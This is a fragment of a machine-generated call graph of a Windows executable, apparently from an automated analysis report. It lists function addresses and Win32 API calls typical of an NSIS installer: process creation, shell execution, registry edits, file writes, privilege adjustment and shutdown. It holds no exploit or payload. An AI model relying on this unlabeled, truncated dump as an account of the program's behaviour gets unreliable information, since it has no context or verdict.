3679->3680 3680->3656 3681->3643 3682->3671 3683->3642 3685 40422d SendMessageW 3684->3685 3686 4053a6 3685->3686 3689 401389 2 API calls 3686->3689 3690 4053cd 3686->3690 3687 40422d SendMessageW 3688 4053df OleUninitialize 3687->3688 3689->3686 3690->3687 3691 40176f 3692 402c37 18 API calls 3691->3692 3693 401776 3692->3693 3694 401796 3693->3694 3695 40179e 3693->3695 3751 40624c lstrcpynW 3694->3751 3752 40624c lstrcpynW 3695->3752 3698 40179c 3702 4064e0 5 API calls 3698->3702 3699 4017a9 3700 405b1d 3 API calls 3699->3700 3701 4017af lstrcatW 3700->3701 3701->3698 3712 4017bb 3702->3712 3703 40658f 2 API calls 3703->3712 3704 405d19 2 API calls 3704->3712 3706 4017cd CompareFileTime 3706->3712 3707 40188d 3708 4052b0 25 API calls 3707->3708 3711 401897 3708->3711 3709 4052b0 25 API calls 3717 401879 3709->3717 3710 40624c lstrcpynW 3710->3712 3730 4030fa 3711->3730 3712->3703 3712->3704 3712->3706 3712->3707 3712->3710 3718 40626e 18 API calls 3712->3718 3727 401864 3712->3727 3729 405d3e GetFileAttributesW CreateFileW 3712->3729 3753 4058ae 3712->3753 3715 4018be SetFileTime 3716 4018d0 CloseHandle 3715->3716 3716->3717 3719 4018e1 3716->3719 3718->3712 3720 4018e6 3719->3720 3721 4018f9 3719->3721 3722 40626e 18 API calls 3720->3722 3723 40626e 18 API calls 3721->3723 3725 4018ee lstrcatW 3722->3725 3726 401901 3723->3726 3725->3726 3728 4058ae MessageBoxIndirectW 3726->3728 3727->3709 3727->3717 3728->3717 3729->3712 3731 403113 3730->3731 3732 40313e 3731->3732 3768 4032f5 SetFilePointer 3731->3768 3757 4032df 3732->3757 3736 40315b GetTickCount 3747 40316e 3736->3747 3737 40327f 3738 403283 3737->3738 3743 40329b 3737->3743 3740 4032df ReadFile 3738->3740 3739 4018aa 3739->3715 3739->3716 3740->3739 3741 4032df ReadFile 3741->3743 3742 4032df ReadFile 3742->3747 3743->3739 3743->3741 3744 405df0 WriteFile 3743->3744 3744->3743 3746 4031d4 GetTickCount 3746->3747 3747->3739 3747->3742 3747->3746 3748 4031fd MulDiv wsprintfW 3747->3748 3750 405df0 
WriteFile 3747->3750 3760 4067a7 3747->3760 3749 4052b0 25 API calls 3748->3749 3749->3747 3750->3747 3751->3698 3752->3699 3754 4058c3 3753->3754 3755 40590f 3754->3755 3756 4058d7 MessageBoxIndirectW 3754->3756 3755->3712 3756->3755 3758 405dc1 ReadFile 3757->3758 3759 403149 3758->3759 3759->3736 3759->3737 3759->3739 3761 4067cc 3760->3761 3762 4067d4 3760->3762 3761->3747 3762->3761 3763 406864 GlobalAlloc 3762->3763 3764 40685b GlobalFree 3762->3764 3766 4068d2 GlobalFree 3762->3766 3767 4068db GlobalAlloc 3762->3767 3763->3761 3765 406878 3763->3765 3764->3763 3765->3762 3766->3767 3767->3761 3767->3762 3768->3732 4326 402570 4327 402c37 18 API calls 4326->4327 4328 402577 4327->4328 4331 405d3e GetFileAttributesW CreateFileW 4328->4331 4330 402583 4331->4330 4332 401b71 4333 401bc2 4332->4333 4334 401b7e 4332->4334 4336 401bc7 4333->4336 4337 401bec GlobalAlloc 4333->4337 4335 4022de 4334->4335 4342 401b95 4334->4342 4339 40626e 18 API calls 4335->4339 4345 401c07 4336->4345 4353 40624c lstrcpynW 4336->4353 4338 40626e 18 API calls 4337->4338 4338->4345 4341 4022eb 4339->4341 4347 4058ae MessageBoxIndirectW 4341->4347 4351 40624c lstrcpynW 4342->4351 4343 401bd9 GlobalFree 4343->4345 4346 401ba4 4352 40624c lstrcpynW 4346->4352 4347->4345 4349 401bb3 4354 40624c lstrcpynW 4349->4354 4351->4346 4352->4349 4353->4343 4354->4345 3769 4024f2 3770 402c77 18 API calls 3769->3770 3771 4024fc 3770->3771 3772 402c15 18 API calls 3771->3772 3773 402505 3772->3773 3774 402521 RegEnumKeyW 3773->3774 3775 40252d RegEnumValueW 3773->3775 3776 402885 3773->3776 3777 402549 RegCloseKey 3774->3777 3775->3777 3778 402542 3775->3778 3777->3776 3778->3777 4355 401a72 4356 402c15 18 API calls 4355->4356 4357 401a78 4356->4357 4358 402c15 18 API calls 4357->4358 4359 401a20 4358->4359 3780 401573 3781 401583 ShowWindow 3780->3781 3782 40158c 3780->3782 3781->3782 3783 40159a ShowWindow 3782->3783 3784 402abf 3782->3784 3783->3784 4360 4042f5 lstrcpynW lstrlenW 4361 4014f5 
SetForegroundWindow 4362 402abf 4361->4362 4370 401e77 4371 402c37 18 API calls 4370->4371 4372 401e7d 4371->4372 4373 402c37 18 API calls 4372->4373 4374 401e86 4373->4374 4375 402c37 18 API calls 4374->4375 4376 401e8f 4375->4376 4377 402c37 18 API calls 4376->4377 4378 401e98 4377->4378 4379 401423 25 API calls 4378->4379 4380 401e9f 4379->4380 4387 405874 ShellExecuteExW 4380->4387 4382 401ee1 4383 4066d7 5 API calls 4382->4383 4385 402885 4382->4385 4384 401efb CloseHandle 4383->4384 4384->4385 4387->4382 3807 40167b 3808 402c37 18 API calls 3807->3808 3809 401682 3808->3809 3810 402c37 18 API calls 3809->3810 3811 40168b 3810->3811 3812 402c37 18 API calls 3811->3812 3813 401694 MoveFileW 3812->3813 3814 4016a0 3813->3814 3815 4016a7 3813->3815 3817 401423 25 API calls 3814->3817 3816 40658f 2 API calls 3815->3816 3819 40224a 3815->3819 3818 4016b6 3816->3818 3817->3819 3818->3819 3820 406012 37 API calls 3818->3820 3820->3814 4086 4020fe 4087 402c37 18 API calls 4086->4087 4088 402105 4087->4088 4089 402c37 18 API calls 4088->4089 4090 40210f 4089->4090 4091 402c37 18 API calls 4090->4091 4092 402119 4091->4092 4093 402c37 18 API calls 4092->4093 4094 402123 4093->4094 4095 402c37 18 API calls 4094->4095 4096 40212d 4095->4096 4097 40216c CoCreateInstance 4096->4097 4098 402c37 18 API calls 4096->4098 4101 40218b 4097->4101 4098->4097 4099 401423 25 API calls 4100 40224a 4099->4100 4101->4099 4101->4100 4102 40247e 4103 402c77 18 API calls 4102->4103 4104 402488 4103->4104 4105 402c37 18 API calls 4104->4105 4106 402491 4105->4106 4107 40249c RegQueryValueExW 4106->4107 4112 402885 4106->4112 4108 4024c2 RegCloseKey 4107->4108 4109 4024bc 4107->4109 4108->4112 4109->4108 4113 406193 wsprintfW 4109->4113 4113->4108 4388 40437e 4389 404396 4388->4389 4391 4044b0 4388->4391 4396 4041e1 19 API calls 4389->4396 4390 40451a 4392 4045e4 4390->4392 4393 404524 GetDlgItem 4390->4393 4391->4390 4391->4392 4398 4044eb GetDlgItem SendMessageW 4391->4398 4397 404248 8 
API calls 4392->4397 4394 4045a5 4393->4394 4395 40453e 4393->4395 4394->4392 4402 4045b7 4394->4402 4395->4394 4401 404564 SendMessageW LoadCursorW SetCursor 4395->4401 4399 4043fd 4396->4399 4412 4045df 4397->4412 4421 404203 KiUserCallbackDispatcher 4398->4421 4400 4041e1 19 API calls 4399->4400 4404 40440a CheckDlgButton 4400->4404 4422 40462d 4401->4422 4406 4045cd 4402->4406 4407 4045bd SendMessageW 4402->4407 4419 404203 KiUserCallbackDispatcher 4404->4419 4411 4045d3 SendMessageW 4406->4411 4406->4412 4407->4406 4408 404515 4413 404609 SendMessageW 4408->4413 4411->4412 4413->4390 4414 404428 GetDlgItem 4420 404216 SendMessageW 4414->4420 4416 40443e SendMessageW 4417 404464 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4416->4417 4418 40445b GetSysColor 4416->4418 4417->4412 4418->4417 4419->4414 4420->4416 4421->4408 4425 405874 ShellExecuteExW 4422->4425 4424 404593 LoadCursorW SetCursor 4424->4394 4425->4424 4426 4019ff 4427 402c37 18 API calls 4426->4427 4428 401a06 4427->4428 4429 402c37 18 API calls 4428->4429 4430 401a0f 4429->4430 4431 401a16 lstrcmpiW 4430->4431 4432 401a28 lstrcmpW 4430->4432 4433 401a1c 4431->4433 4432->4433 3191 401f00 3206 402c37 3191->3206 3198 402885 3201 401f2b 3202 401f30 3201->3202 3203 401f3b 3201->3203 3231 406193 wsprintfW 3202->3231 3205 401f39 CloseHandle 3203->3205 3205->3198 3207 402c43 3206->3207 3232 40626e 3207->3232 3210 401f06 3212 4052b0 3210->3212 3213 4052cb 3212->3213 3214 401f10 3212->3214 3215 4052e7 lstrlenW 3213->3215 3216 40626e 18 API calls 3213->3216 3223 405831 CreateProcessW 3214->3223 3217 405310 3215->3217 3218 4052f5 lstrlenW 3215->3218 3216->3215 3220 405323 3217->3220 3221 405316 SetWindowTextW 3217->3221 3218->3214 3219 405307 lstrcatW 3218->3219 3219->3217 3220->3214 3222 405329 SendMessageW SendMessageW SendMessageW 3220->3222 3221->3220 3222->3214 3224 401f16 3223->3224 3225 405864 CloseHandle 3223->3225 3224->3198 3224->3205 3226 4066d7 WaitForSingleObject 3224->3226 
3225->3224 3227 4066f1 3226->3227 3228 406703 GetExitCodeProcess 3227->3228 3275 406662 3227->3275 3228->3201 3231->3205 3236 40627b 3232->3236 3233 4064c6 3234 402c64 3233->3234 3266 40624c lstrcpynW 3233->3266 3234->3210 3250 4064e0 3234->3250 3236->3233 3237 406494 lstrlenW 3236->3237 3238 40626e 10 API calls 3236->3238 3242 4063a9 GetSystemDirectoryW 3236->3242 3243 4063bc GetWindowsDirectoryW 3236->3243 3244 4064e0 5 API calls 3236->3244 3245 406437 lstrcatW 3236->3245 3246 40626e 10 API calls 3236->3246 3247 4063f0 SHGetSpecialFolderLocation 3236->3247 3248 4063dd SHGetFolderPathW 3236->3248 3259 40611a 3236->3259 3264 406193 wsprintfW 3236->3264 3265 40624c lstrcpynW 3236->3265 3237->3236 3238->3237 3242->3236 3243->3236 3244->3236 3245->3236 3246->3236 3247->3236 3249 406408 SHGetPathFromIDListW CoTaskMemFree 3247->3249 3248->3236 3248->3247 3249->3236 3257 4064ed 3250->3257 3251 406563 3252 406568 CharPrevW 3251->3252 3254 406589 3251->3254 3252->3251 3253 406556 CharNextW 3253->3251 3253->3257 3254->3210 3256 406542 CharNextW 3256->3257 3257->3251 3257->3253 3257->3256 3258 406551 CharNextW 3257->3258 3271 405b4a 3257->3271 3258->3253 3267 4060b9 3259->3267 3262 40617e 3262->3236 3263 40614e RegQueryValueExW RegCloseKey 3263->3262 3264->3236 3265->3236 3266->3234 3268 4060c8 3267->3268 3269 4060d1 RegOpenKeyExW 3268->3269 3270 4060cc 3268->3270 3269->3270 3270->3262 3270->3263 3272 405b50 3271->3272 3273 405b66 3272->3273 3274 405b57 CharNextW 3272->3274 3273->3257 3274->3272 3276 40667f PeekMessageW 3275->3276 3277 406675 DispatchMessageW 3276->3277 3278 40668f WaitForSingleObject 3276->3278 3277->3276 3278->3227 4434 401000 4435 401037 BeginPaint GetClientRect 4434->4435 4436 40100c DefWindowProcW 4434->4436 4438 4010f3 4435->4438 4439 401179 4436->4439 4440 401073 CreateBrushIndirect FillRect DeleteObject 4438->4440 4441 4010fc 4438->4441 4440->4438 4442 401102 CreateFontIndirectW 4441->4442 4443 401167 EndPaint 4441->4443 4442->4443 4444 401112 6 API 
calls 4442->4444 4443->4439 4444->4443 4445 401503 4446 40150b 4445->4446 4448 40151e 4445->4448 4447 402c15 18 API calls 4446->4447 4447->4448 3478 402306 3479 40230e 3478->3479 3482 402314 3478->3482 3480 402c37 18 API calls 3479->3480 3480->3482 3481 402322 3484 402330 3481->3484 3485 402c37 18 API calls 3481->3485 3482->3481 3483 402c37 18 API calls 3482->3483 3483->3481 3486 402c37 18 API calls 3484->3486 3485->3484 3487 402339 WritePrivateProfileStringW 3486->3487 4449 404a06 4450 404a32 4449->4450 4451 404a16 4449->4451 4453 404a65 4450->4453 4454 404a38 SHGetPathFromIDListW 4450->4454 4460 405892 GetDlgItemTextW 4451->4460 4456 404a4f SendMessageW 4454->4456 4457 404a48 4454->4457 4455 404a23 SendMessageW 4455->4450 4456->4453 4458 40140b 2 API calls 4457->4458 4458->4456 4460->4455 4461 401f86 4462 402c37 18 API calls 4461->4462 4463 401f8d 4462->4463 4464 406626 5 API calls 4463->4464 4465 401f9c 4464->4465 4466 401fb8 GlobalAlloc 4465->4466 4467 402020 4465->4467 4466->4467 4468 401fcc 4466->4468 4469 406626 5 API calls 4468->4469 4470 401fd3 4469->4470 4471 406626 5 API calls 4470->4471 4472 401fdd 4471->4472 4472->4467 4476 406193 wsprintfW 4472->4476 4474 402012 4477 406193 wsprintfW 4474->4477 4476->4474 4477->4467 3495 403d08 3496 403d20 3495->3496 3497 403e5b 3495->3497 3496->3497 3499 403d2c 3496->3499 3498 403e6c GetDlgItem GetDlgItem 3497->3498 3503 403eac 3497->3503 3502 4041e1 19 API calls 3498->3502 3500 403d37 SetWindowPos 3499->3500 3501 403d4a 3499->3501 3500->3501 3505 403d67 3501->3505 3506 403d4f ShowWindow 3501->3506 3507 403e96 SetClassLongW 3502->3507 3504 403f06 3503->3504 3512 401389 2 API calls 3503->3512 3513 403e56 3504->3513 3566 40422d 3504->3566 3509 403d89 3505->3509 3510 403d6f DestroyWindow 3505->3510 3506->3505 3511 40140b 2 API calls 3507->3511 3515 403d8e SetWindowLongW 3509->3515 3516 403d9f 3509->3516 3514 40416a 3510->3514 3511->3503 3517 403ede 3512->3517 3514->3513 3523 40419b ShowWindow 3514->3523 3515->3513 3520 
403e48 3516->3520 3521 403dab GetDlgItem 3516->3521 3517->3504 3522 403ee2 SendMessageW 3517->3522 3518 40140b 2 API calls 3535 403f18 3518->3535 3519 40416c DestroyWindow EndDialog 3519->3514 3588 404248 3520->3588 3524 403ddb 3521->3524 3525 403dbe SendMessageW IsWindowEnabled 3521->3525 3522->3513 3523->3513 3528 403de8 3524->3528 3529 403dfb 3524->3529 3530 403e2f SendMessageW 3524->3530 3539 403de0 3524->3539 3525->3513 3525->3524 3527 40626e 18 API calls 3527->3535 3528->3530 3528->3539 3532 403e03 3529->3532 3533 403e18 3529->3533 3530->3520 3582 40140b 3532->3582 3537 40140b 2 API calls 3533->3537 3534 403e16 3534->3520 3535->3513 3535->3518 3535->3519 3535->3527 3538 4041e1 19 API calls 3535->3538 3557 4040ac DestroyWindow 3535->3557 3569 4041e1 3535->3569 3540 403e1f 3537->3540 3538->3535 3585 4041ba 3539->3585 3540->3520 3540->3539 3542 403f93 GetDlgItem 3543 403fb0 ShowWindow KiUserCallbackDispatcher 3542->3543 3544 403fa8 3542->3544 3572 404203 KiUserCallbackDispatcher 3543->3572 3544->3543 3546 403fda EnableWindow 3551 403fee 3546->3551 3547 403ff3 GetSystemMenu EnableMenuItem SendMessageW 3548 404023 SendMessageW 3547->3548 3547->3551 3548->3551 3551->3547 3573 404216 SendMessageW 3551->3573 3574 403ce9 3551->3574 3577 40624c lstrcpynW 3551->3577 3553 404052 lstrlenW 3554 40626e 18 API calls 3553->3554 3555 404068 SetWindowTextW 3554->3555 3578 401389 3555->3578 3557->3514 3558 4040c6 CreateDialogParamW 3557->3558 3558->3514 3559 4040f9 3558->3559 3560 4041e1 19 API calls 3559->3560 3561 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3560->3561 3562 401389 2 API calls 3561->3562 3563 40414a 3562->3563 3563->3513 3564 404152 ShowWindow 3563->3564 3565 40422d SendMessageW 3564->3565 3565->3514 3567 404245 3566->3567 3568 404236 SendMessageW 3566->3568 3567->3535 3568->3567 3570 40626e 18 API calls 3569->3570 3571 4041ec SetDlgItemTextW 3570->3571 3571->3542 3572->3546 3573->3551 3575 40626e 18 API calls 3574->3575 3576 403cf7 
SetWindowTextW 3575->3576 3576->3551 3577->3553 3580 401390 3578->3580 3579 4013fe 3579->3535 3580->3579 3581 4013cb MulDiv SendMessageW 3580->3581 3581->3580 3583 401389 2 API calls 3582->3583 3584 401420 3583->3584 3584->3539 3586 4041c1 3585->3586 3587 4041c7 SendMessageW 3585->3587 3586->3587 3587->3534 3589 404260 GetWindowLongW 3588->3589 3599 4042e9 3588->3599 3590 404271 3589->3590 3589->3599 3591 404280 GetSysColor 3590->3591 3592 404283 3590->3592 3591->3592 3593 404293 SetBkMode 3592->3593 3594 404289 SetTextColor 3592->3594 3595 4042b1 3593->3595 3596 4042ab GetSysColor 3593->3596 3594->3593 3597 4042c2 3595->3597 3598 4042b8 SetBkColor 3595->3598 3596->3595 3597->3599 3600 4042d5 DeleteObject 3597->3600 3601 4042dc CreateBrushIndirect 3597->3601 3598->3597 3599->3513 3600->3601 3601->3599 3602 402388 3603 402390 3602->3603 3604 4023bb 3602->3604 3618 402c77 3603->3618 3606 402c37 18 API calls 3604->3606 3608 4023c2 3606->3608 3614 402cf5 3608->3614 3609 4023a1 3611 402c37 18 API calls 3609->3611 3613 4023a8 RegDeleteValueW RegCloseKey 3611->3613 3612 4023cf 3613->3612 3615 402d0b 3614->3615 3617 402d21 3615->3617 3623 402d2a 3615->3623 3617->3612 3619 402c37 18 API calls 3618->3619 3620 402c8e 3619->3620 3621 4060b9 RegOpenKeyExW 3620->3621 3622 402397 3621->3622 3622->3609 3622->3612 3624 4060b9 RegOpenKeyExW 3623->3624 3625 402d58 3624->3625 3626 402dd0 3625->3626 3627 402d5c 3625->3627 3626->3617 3628 402d7e RegEnumKeyW 3627->3628 3629 402d95 RegCloseKey 3627->3629 3630 402db6 RegCloseKey 3627->3630 3632 402d2a 6 API calls 3627->3632 3628->3627 3628->3629 3631 406626 5 API calls 3629->3631 3630->3626 3633 402da5 3631->3633 3632->3627 3634 402dc4 RegDeleteKeyW 3633->3634 3635 402da9 3633->3635 3634->3626 3635->3626 4485 40190c 4486 401943 4485->4486 4487 402c37 18 API calls 4486->4487 4488 401948 4487->4488 4489 40595a 68 API calls 4488->4489 4490 401951 4489->4490 4498 401d0e 4499 402c15 18 API calls 4498->4499 4500 401d15 4499->4500 4501 402c15 18 
API calls 4500->4501 4502 401d21 GetDlgItem 4501->4502 4503 40258c 4502->4503 4504 40190f 4505 402c37 18 API calls 4504->4505 4506 401916 4505->4506 4507 4058ae MessageBoxIndirectW 4506->4507 4508 40191f 4507->4508 4509 401491 4510 4052b0 25 API calls 4509->4510 4511 401498 4510->4511 4512 402592 4513 4025c1 4512->4513 4514 4025a6 4512->4514 4516 4025f5 4513->4516 4517 4025c6 4513->4517 4515 402c15 18 API calls 4514->4515 4522 4025ad 4515->4522 4518 402c37 18 API calls 4516->4518 4519 402c37 18 API calls 4517->4519 4520 4025fc lstrlenW 4518->4520 4521 4025cd WideCharToMultiByte lstrlenA 4519->4521 4520->4522 4521->4522 4523 402629 4522->4523 4524 40263f 4522->4524 4526 405e1f 5 API calls 4522->4526 4523->4524 4525 405df0 WriteFile 4523->4525 4525->4524 4526->4523 4534 403918 4535 403923 4534->4535 4536 403927 4535->4536 4537 40392a GlobalAlloc 4535->4537 4537->4536 3785 401c19 3786 402c15 18 API calls 3785->3786 3787 401c20 3786->3787 3788 402c15 18 API calls 3787->3788 3789 401c2d 3788->3789 3790 401c42 3789->3790 3791 402c37 18 API calls 3789->3791 3792 401c52 3790->3792 3793 402c37 18 API calls 3790->3793 3791->3790 3794 401ca9 3792->3794 3795 401c5d 3792->3795 3793->3792 3797 402c37 18 API calls 3794->3797 3796 402c15 18 API calls 3795->3796 3798 401c62 3796->3798 3799 401cae 3797->3799 3800 402c15 18 API calls 3798->3800 3801 402c37 18 API calls 3799->3801 3802 401c6e 3800->3802 3803 401cb7 FindWindowExW 3801->3803 3804 401c99 SendMessageW 3802->3804 3805 401c7b SendMessageTimeoutW 3802->3805 3806 401cd9 3803->3806 3804->3806 3805->3806 4538 402a9a SendMessageW 4539 402ab4 InvalidateRect 4538->4539 4540 402abf 4538->4540 4539->4540 4541 40281b 4542 402821 4541->4542 4543 402829 FindClose 4542->4543 4544 402abf 4542->4544 4543->4544 4545 40149e 4546 4022f1 4545->4546 4547 4014ac PostQuitMessage 4545->4547 4547->4546 4548 4029a2 4549 402c15 18 API calls 4548->4549 4550 4029a8 4549->4550 4551 4029e8 4550->4551 4552 4029cf 4550->4552 4554 402885 4550->4554 4555 
402a02 4551->4555 4556 4029f2 4551->4556 4553 4029d4 4552->4553 4561 4029e5 4552->4561 4562 40624c lstrcpynW 4553->4562 4558 40626e 18 API calls 4555->4558 4557 402c15 18 API calls 4556->4557 4557->4561 4558->4561 4561->4554 4563 406193 wsprintfW 4561->4563 4562->4554 4563->4554 3474 4015a3 3475 402c37 18 API calls 3474->3475 3476 4015aa SetFileAttributesW 3475->3476 3477 4015bc 3476->3477 4571 405224 4572 405234 4571->4572 4573 405248 4571->4573 4574 40523a 4572->4574 4583 405291 4572->4583 4575 405250 IsWindowVisible 4573->4575 4579 405267 4573->4579 4577 40422d SendMessageW 4574->4577 4578 40525d 4575->4578 4575->4583 4576 405296 CallWindowProcW 4580 405244 4576->4580 4577->4580 4584 404b7a SendMessageW 4578->4584 4579->4576 4589 404bfa 4579->4589 4583->4576 4585 404bd9 SendMessageW 4584->4585 4586 404b9d GetMessagePos ScreenToClient SendMessageW 4584->4586 4587 404bd1 4585->4587 4586->4587 4588 404bd6 4586->4588 4587->4579 4588->4585 4598 40624c lstrcpynW 4589->4598 4591 404c0d 4599 406193 wsprintfW 4591->4599 4593 404c17 4594 40140b 2 API calls 4593->4594 4595 404c20 4594->4595 4600 40624c lstrcpynW 4595->4600 4597 404c27 4597->4583 4598->4591 4599->4593 4600->4597 4601 4028a7 4602 402c37 18 API calls 4601->4602 4603 4028b5 4602->4603 4604 4028cb 4603->4604 4605 402c37 18 API calls 4603->4605 4606 405d19 2 API calls 4604->4606 4605->4604 4607 4028d1 4606->4607 4629 405d3e GetFileAttributesW CreateFileW 4607->4629 4609 4028de 4610 402981 4609->4610 4611 4028ea GlobalAlloc 4609->4611 4614 402989 DeleteFileW 4610->4614 4615 40299c 4610->4615 4612 402903 4611->4612 4613 402978 CloseHandle 4611->4613 4630 4032f5 SetFilePointer 4612->4630 4613->4610 4614->4615 4617 402909 4618 4032df ReadFile 4617->4618 4619 402912 GlobalAlloc 4618->4619 4620 402922 4619->4620 4621 402956 4619->4621 4623 4030fa 36 API calls 4620->4623 4622 405df0 WriteFile 4621->4622 4624 402962 GlobalFree 4622->4624 4628 40292f 4623->4628 4625 4030fa 36 API calls 4624->4625 4627 402975 4625->4627 
4626 40294d GlobalFree 4626->4621 4627->4613 4628->4626 4629->4609 4630->4617 4631 404c2c GetDlgItem GetDlgItem 4632 404c7e 7 API calls 4631->4632 4641 404e97 4631->4641 4633 404d21 DeleteObject 4632->4633 4634 404d14 SendMessageW 4632->4634 4635 404d2a 4633->4635 4634->4633 4636 404d61 4635->4636 4640 40626e 18 API calls 4635->4640 4638 4041e1 19 API calls 4636->4638 4637 404f7b 4639 405027 4637->4639 4643 404e8a 4637->4643 4649 404fd4 SendMessageW 4637->4649 4642 404d75 4638->4642 4644 405031 SendMessageW 4639->4644 4645 405039 4639->4645 4646 404d43 SendMessageW SendMessageW 4640->4646 4641->4637 4647 404b7a 5 API calls 4641->4647 4665 404f08 4641->4665 4648 4041e1 19 API calls 4642->4648 4650 404248 8 API calls 4643->4650 4644->4645 4652 405052 4645->4652 4653 40504b ImageList_Destroy 4645->4653 4660 405062 4645->4660 4646->4635 4647->4665 4666 404d83 4648->4666 4649->4643 4655 404fe9 SendMessageW 4649->4655 4656 40521d 4650->4656 4651 404f6d SendMessageW 4651->4637 4657 40505b GlobalFree 4652->4657 4652->4660 4653->4652 4654 4051d1 4654->4643 4661 4051e3 ShowWindow GetDlgItem ShowWindow 4654->4661 4659 404ffc 4655->4659 4657->4660 4658 404e58 GetWindowLongW SetWindowLongW 4662 404e71 4658->4662 4670 40500d SendMessageW 4659->4670 4660->4654 4674 404bfa 4 API calls 4660->4674 4678 40509d 4660->4678 4661->4643 4663 404e77 ShowWindow 4662->4663 4664 404e8f 4662->4664 4682 404216 SendMessageW 4663->4682 4683 404216 SendMessageW 4664->4683 4665->4637 4665->4651 4666->4658 4669 404dd3 SendMessageW 4666->4669 4671 404e52 4666->4671 4672 404e20 SendMessageW 4666->4672 4673 404e0f SendMessageW 4666->4673 4669->4666 4670->4639 4671->4658 4671->4662 4672->4666 4673->4666 4674->4678 4675 4051a7 InvalidateRect 4675->4654 4676 4051bd 4675->4676 4679 404b35 21 API calls 4676->4679 4677 4050cb SendMessageW 4681 4050e1 4677->4681 4678->4677 4678->4681 4679->4654 4680 405155 SendMessageW SendMessageW 4680->4681 4681->4675 4681->4680 4682->4643 4683->4641 4684 40202c 4685 40203e 
4684->4685 4695 4020f0 4684->4695 4686 402c37 18 API calls 4685->4686 4687 402045 4686->4687 4689 402c37 18 API calls 4687->4689 4688 401423 25 API calls 4693 40224a 4688->4693 4690 40204e 4689->4690 4691 402064 LoadLibraryExW 4690->4691 4692 402056 GetModuleHandleW 4690->4692 4694 402075 4691->4694 4691->4695 4692->4691 4692->4694 4704 406695 WideCharToMultiByte 4694->4704 4695->4688 4698 402086 4701 401423 25 API calls 4698->4701 4702 402096 4698->4702 4699 4020bf 4700 4052b0 25 API calls 4699->4700 4700->4702 4701->4702 4702->4693 4703 4020e2 FreeLibrary 4702->4703 4703->4693 4705 402080 4704->4705 4706 4066bf GetProcAddress 4704->4706 4705->4698 4705->4699 4706->4705 4707 40432f lstrlenW 4708 404350 WideCharToMultiByte 4707->4708 4709 40434e 4707->4709 4709->4708 4710 402a2f 4711 402c15 18 API calls 4710->4711 4712 402a35 4711->4712 4713 402a6c 4712->4713 4714 402885 4712->4714 4716 402a47 4712->4716 4713->4714 4715 40626e 18 API calls 4713->4715 4715->4714 4716->4714 4718 406193 wsprintfW 4716->4718 4718->4714 4719 401a30 4720 402c37 18 API calls 4719->4720 4721 401a39 ExpandEnvironmentStringsW 4720->4721 4722 401a4d 4721->4722 4724 401a60 4721->4724 4723 401a52 lstrcmpW 4722->4723 4722->4724 4723->4724 4730 401db3 GetDC 4731 402c15 18 API calls 4730->4731 4732 401dc5 GetDeviceCaps MulDiv ReleaseDC 4731->4732 4733 402c15 18 API calls 4732->4733 4734 401df6 4733->4734 4735 40626e 18 API calls 4734->4735 4736 401e33 CreateFontIndirectW 4735->4736 4737 40258c 4736->4737 4738 401735 4739 402c37 18 API calls 4738->4739 4740 40173c SearchPathW 4739->4740 4741 401757 4740->4741 4742 402835 4743 40283d 4742->4743 4744 402841 FindNextFileW 4743->4744 4747 402853 4743->4747 4745 40289a 4744->4745 4744->4747 4748 40624c lstrcpynW 4745->4748 4748->4747 4749 4014b8 4750 4014be 4749->4750 4751 401389 2 API calls 4750->4751 4752 4014c6 4751->4752 3831 40333d SetErrorMode GetVersion 3832 40337c 3831->3832 3833 403382 3831->3833 3834 406626 5 API calls 3832->3834 3835 4065b6 3 
API calls 3833->3835 3834->3833 3836 403398 lstrlenA 3835->3836 3836->3833 3837 4033a8 3836->3837 3838 406626 5 API calls 3837->3838 3839 4033af 3838->3839 3840 406626 5 API calls 3839->3840 3841 4033b6 3840->3841 3842 406626 5 API calls 3841->3842 3843 4033c2 #17 OleInitialize SHGetFileInfoW 3842->3843 3922 40624c lstrcpynW 3843->3922 3846 40340e GetCommandLineW 3923 40624c lstrcpynW 3846->3923 3848 403420 GetModuleHandleW 3849 403438 3848->3849 3850 405b4a CharNextW 3849->3850 3851 403447 CharNextW 3850->3851 3852 403571 GetTempPathW 3851->3852 3862 403460 3851->3862 3924 40330c 3852->3924 3854 403589 3855 4035e3 DeleteFileW 3854->3855 3856 40358d GetWindowsDirectoryW lstrcatW 3854->3856 3934 402ec1 GetTickCount GetModuleFileNameW 3855->3934 3857 40330c 12 API calls 3856->3857 3860 4035a9 3857->3860 3858 405b4a CharNextW 3858->3862 3860->3855 3863 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3860->3863 3861 4035f7 3869 405b4a CharNextW 3861->3869 3906 40369a 3861->3906 3917 4036aa 3861->3917 3862->3858 3865 40355c 3862->3865 3867 40355a 3862->3867 3866 40330c 12 API calls 3863->3866 4018 40624c lstrcpynW 3865->4018 3872 4035db 3866->3872 3867->3852 3873 403616 3869->3873 3872->3855 3872->3917 3880 403674 3873->3880 3881 4036da 3873->3881 3874 4037e4 3877 4037ec GetCurrentProcess OpenProcessToken 3874->3877 3878 403868 ExitProcess 3874->3878 3875 4036c4 3876 4058ae MessageBoxIndirectW 3875->3876 3882 4036d2 ExitProcess 3876->3882 3883 403804 LookupPrivilegeValueW AdjustTokenPrivileges 3877->3883 3884 403838 3877->3884 3885 405c25 18 API calls 3880->3885 3886 405819 5 API calls 3881->3886 3883->3884 3887 406626 5 API calls 3884->3887 3888 403680 3885->3888 3889 4036df lstrcatW 3886->3889 3890 40383f 3887->3890 3888->3917 4019 40624c lstrcpynW 3888->4019 3892 4036f0 lstrcatW 3889->3892 3893 4036fb lstrcatW lstrcmpiW 3889->3893 3891 403854 ExitWindowsEx 3890->3891 3894 403861 3890->3894 3891->3878 3891->3894 3892->3893 3896 403717 
